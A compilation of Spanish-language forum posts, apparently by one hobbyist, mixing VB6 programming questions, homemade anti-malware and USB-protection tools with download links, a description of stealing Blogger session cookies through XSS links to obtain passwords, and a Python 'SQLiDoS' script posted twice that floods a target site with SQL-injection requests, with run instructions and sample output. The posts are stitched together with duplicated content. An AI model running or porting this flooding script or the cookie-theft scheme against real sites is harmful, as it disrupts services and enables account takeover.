Hola a todos, tuve una idea sobre un programa que para mi puede ser muy interesante, pero me encuentro con la duda de que si se puede ver cuanto pesa un archivo.

He estado mirando como se manejan los archivos en vb6 pero no encontré la manera...

gracias y espero que me puedan responder

Hola a todos, hace ya tiempo que diseñe en javascript un sistema para robar las cookies de blogger y asi sacar la pass, con fines de poder demostrar que blogger era vulnerable a XSS y inyectar una URL este javascript.

Puede que mucho lo sepais, pero en el buscador no lo he visto, asi que he decidido postearlo en este foro.

Hay que ser justos y comentar que si hacen controles en los comentarios, donde no es posible realizar estos ataques, pero le da total libertad al escritor del blog para insertar lo que tengan ganas.

Esto permite al blogger utilizar el blog como punto de ataque utilizando la confianza que pueden tener los lectores en un site como éste.
Realmente es muy fácil caer en blogs de blogger haciendo búsquedas en sites como google. Además blogger incorpora en todos los blogs un buscador de blogs, y el botón siguiente blog que nos lleva ciegamente a otros blogs.

Si en una entrada publican un link maligno, que redireccione al javascript que roba la cookie de blogger, ya tienes la pass. 


Salu2 y espero que vigilen más los que usan blogger

Hola a todos, alguien me podría decir cuando se celebra el concurso Ehn-Dev 2011?

gracias

fuente: es.refref.org

Hola a todos, buscando encontre este code pero no funciona....

Cuando lo ejecuto no pasa nada en el terminal sale asi:

>

y no hace mas.... espero que me puedan ayudar

#!/usr/bin/python
# SQLiDoS - SQL Denial of Service
 
import socket
import sys
 
if len(sys.argv) != 4:
    print "[+] Uso: SQLiDoS.py <Target Web> <SQLi Injection> <Connection Numbers>"
    sys.exit(1)
 
def attack():
	connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connection.connect((sys.argv[1], 80))
	print "[+] GET /" + sys.argv[2] + " HTTP/1.1"
	connection.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")
	connection.send("Host: " + sys.argv[1]  + "\r\n\r\n");
	connection.close()
 
Host = sys.argv[1]
SQLi = sys.argv[2]
CoNum = int(sys.argv[3])
print "[+] Connecting to %s" % (Host)
print "[+] Injecting %s" % (SQLi)
for i in range(1, CoNum+1):
	attack()

Como ejecutarlo:

SQLiDoS.py www.sitioweb.com index.php?id=' 10

Funciona:

[+] Connecting to www.sitioweb.com
[+] Injecting index.php?id='
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1

Les agradezco la ayuda de antemano!

saludos

Hola a todos, estuve buscando y buscando muchoooo por internet y no encontre nada sobre esto. Tengo un codigo en pythoon que me gustaría realizar en javascript pero no se por donde empezar:

#!/usr/bin/python
# SQLiDoS - SQL Denial of Service
 
import socket
import sys
 
if len(sys.argv) != 4:
    print "[+] Uso: SQLiDoS.py <Target Web> <SQLi Injection> <Connection Numbers>"
    sys.exit(1)
 
def attack():
	connection = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	connection.connect((sys.argv[1], 80))
	print "[+] GET /" + sys.argv[2] + " HTTP/1.1"
	connection.send("GET /" + sys.argv[2] + " HTTP/1.1\r\n")
	connection.send("Host: " + sys.argv[1]  + "\r\n\r\n");
	connection.close()
 
Host = sys.argv[1]
SQLi = sys.argv[2]
CoNum = int(sys.argv[3])
print "[+] Connecting to %s" % (Host)
print "[+] Injecting %s" % (SQLi)
for i in range(1, CoNum+1):
	attack()

Como ejecutarlo:

SQLiDoS.py www.sitioweb.com index.php?id=' 10

Funciona:

[+] Connecting to www.sitioweb.com
[+] Injecting index.php?id='
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1
[+] GET /noticias.php?id=' HTTP/1.1

Les agradezco la ayuda de antemano!

saludos

HOla a todos de nuevo, hoy les traigo este programita que hice ya un poco mas profesional pero que aún le queda mucho por mejorar.


Es un antivirus para archivos ".bat" ya que busqué por la red pero no había ninguno así que decidí hacer uno propio

Características:
- AntiBatch
- Escaner ".bat"
- USB Protector
- Se minimiza en la barra de tareas para un uso más complejo


si encuentran cualquier bug o sugerencia ya saben

saludos

http://www.megaupload.com/?d=XDLHYI13
http://www.mediafire.com/?t9a3jvqfcql9r9i

[Bit] USB Protector, como su nombre lo indica es una sencilla herramienta capaz de proteger discos extraíbles (USB) o Carpetas (Directorios) con la finalidad de que ningún malware del tipo worm, troyano o cualquier otro entre los muchos que hay no pueda acceder a dicho USB o Directorio.


Explicación Técnica:
El malware que se propaga mediante discos extraíbles o directorios, necesitan crear un archivo llamado "autorun.inf" y dicho archivo lleva la orden de copiarse a la raíz de todo disco extraíble que sea conectado al pc.

Función del programa:
Simula que el archivo "autorun.inf" ya está ubicado al disco extraíble con lo cual el malware no es copiado al USB.


DESCARGA:
http://www.mediafire.com/?7fdtnrin5uya9zc


saludos y espero que les guste

Hola de nuevo, y es que mi vb es de lo que no hay. No me deja poner cualquier icono al formulario xD, todos son .ico y muchas veces me manda el error:

La imagen no es valida 

espero que me puedan ayudar

saludos

Hola a todos de nuevo, hoy tengo una duda existencial  y es que nose si se puede buscar una carpeta con el Common Controls y desde el propio vb6 solo detectar los .txt y organizar sus rutas en un list.

Alguien me puede decir si es posible y si lo es, por donde debería empezar? 

gracias